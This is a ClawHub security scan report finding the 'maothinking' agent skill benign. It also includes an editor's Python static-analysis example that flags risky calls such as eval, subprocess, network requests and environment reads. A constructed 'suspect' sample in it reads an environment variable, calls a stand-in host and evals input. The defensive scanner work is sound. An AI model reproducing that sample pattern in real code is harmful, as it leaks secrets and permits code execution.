Skill v1.0.0

ClawScan security

maothinking · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Apr 9, 2026, 10:13 AM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
The package and its runtime instructions are coherent with its stated purpose (a Mao Zedong–thought analysis/decision toolkit): it does not request credentials, does not download or execute remote code, and performs no unexpected file I/O or network activity.
Guidance
This skill appears internally consistent and low-risk: it is a local Python toolkit that takes CLI or interactive input and returns analysis derived from that input. Before installing, confirm where the package actually comes from: the code references a placeholder GitHub URL and the skill metadata has no homepage, so provenance cannot be verified from the package alone. If you do not trust the origin, run it in an isolated environment (virtualenv, container, or sandbox) rather than installing system-wide. Also remember that the tool encodes ideological/heuristic recommendations, so treat its output as advisory, not authoritative, for high-stakes decisions.

Review Dimensions

Purpose & Capability
ok · The name and description match the code and SKILL.md: modules implement contradiction analysis, situation analysis, a decision helper, and principle summaries. The skill does not request unrelated credentials or binaries. Minor note: README/setup point to a placeholder GitHub repo (https://github.com/your-repo/mao-thinking) and there is no published homepage, so the origin is unclear. This is a provenance issue, not a functional mismatch.
Instruction Scope
ok · SKILL.md instructs the agent to run local Python modules or import functions from the package. The runtime instructions reference only CLI arguments, interactive input, and JSON option payloads. The code does not read unrelated system files or environment variables and does not send data to external endpoints. It does parse JSON supplied on the command line (json.loads); json.loads only builds plain Python objects and cannot execute code, so this is expected behavior for a CLI tool, not an arbitrary code execution vector.
Install Mechanism
ok · No install spec in the registry; the repository includes a normal setup.py and recommends pip install -e . or running the scripts directly. There are no download URLs, no extract steps, and no third-party packages required at runtime (requirements.txt is dev/test oriented). The install mechanism is low-risk, but note that pip executes setup.py during installation, so read it and verify the source before running pip install from an untrusted location.
Credentials
ok · The skill declares no required environment variables, no primary credential, and no config paths. The code does not attempt to read credentials or contact network services. The absence of any environment or credential request is proportional to what a local analysis toolkit needs.
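The Instruction Scope and Credentials findings above both rest on the same kind of check: does the package's source contain calls that a local CLI toolkit has no reason to make (code execution, process spawning, network access, environment reads), while ordinary calls such as json.loads are left in scope? The following is an added example by the editor of how to triage that with Python's ast module. It is not ClawHub's scanner and not code from the mao-thinking skill; the SUSPECT_CALLS list, the scan_source/scan_package helpers and the two sample modules are all constructed for this illustration.

```python
"""Static triage of Python source for calls outside a local CLI tool's scope.

Editor's added example; not ClawHub's scanner or the mao-thinking project's
code. The suspect-call list and sample sources below are constructed.
"""
import ast
from pathlib import Path

# Dotted call names that a local, offline analysis toolkit should not need.
# Matched on the name as written (exact or as a trailing ".suffix"). This does
# not resolve aliases or from-imports ("from os import environ"), so it is a
# triage aid, not a proof of absence.
SUSPECT_CALLS = {
    "eval": "arbitrary code execution",
    "exec": "arbitrary code execution",
    "__import__": "dynamic import",
    "importlib.import_module": "dynamic import",
    "pickle.load": "deserialization of untrusted data",
    "pickle.loads": "deserialization of untrusted data",
    "marshal.loads": "deserialization of untrusted data",
    "yaml.load": "unsafe YAML load (use safe_load)",
    "os.system": "shell execution",
    "subprocess.run": "process execution",
    "subprocess.Popen": "process execution",
    "subprocess.call": "process execution",
    "subprocess.check_output": "process execution",
    "urllib.request.urlopen": "network access",
    "requests.get": "network access",
    "requests.post": "network access",
    "socket.socket": "network access",
    "os.getenv": "environment/credential read",
    "os.environ.get": "environment/credential read",
}
# json.loads is deliberately absent: it only builds plain Python objects.


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src, filename="<src>"):
    """Return [(call_name, reason, lineno), ...] sorted by line for one module."""
    findings = []
    for node in ast.walk(ast.parse(src, filename=filename)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name is None:
                continue
            for suspect, reason in SUSPECT_CALLS.items():
                if name == suspect or name.endswith("." + suspect):
                    findings.append((name, reason, node.lineno))
                    break
        elif isinstance(node, ast.Subscript):
            # os.environ["TOKEN"] is an environment read with no call involved.
            if dotted_name(node.value) == "os.environ":
                findings.append(("os.environ[]", "environment/credential read", node.lineno))
    findings.sort(key=lambda f: f[2])
    return findings


def scan_package(root):
    """Scan every .py file under root; return {relative_path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.py")):
        findings = scan_source(path.read_text(encoding="utf-8"), str(path))
        if findings:
            report[str(path.relative_to(root))] = findings
    return report


# Constructed sample resembling the skill as described: argparse + json.loads.
BENIGN_SAMPLE = """\
import argparse
import json

def main():
    p = argparse.ArgumentParser()
    p.add_argument("--options", default="{}")
    args = p.parse_args()
    opts = json.loads(args.options)
    return opts
"""

# Constructed sample of what would have failed the Instruction Scope and
# Credentials checks: env read, outbound request, eval of user input.
SUSPECT_SAMPLE = """\
import os
import json
import urllib.request

def main():
    opts = json.loads(os.environ.get("OPTS", "{}"))
    urllib.request.urlopen("http://example.invalid/" + opts.get("path", ""))
    return eval(opts.get("expr", "0"))
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(label, scan_source(src) or "in scope")
```

Run scan_package on the unpacked skill directory before pip install -e .; an empty report is consistent with the verdict above, while any hit on setup.py deserves particular attention because that file executes at install time.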
Persistence & Privilege
ok · always:false and the default agent invocation settings are used. The package does not attempt to modify other skills or global agent configuration and does not persist or escalate privileges. It only exposes ordinary CLI/module functionality.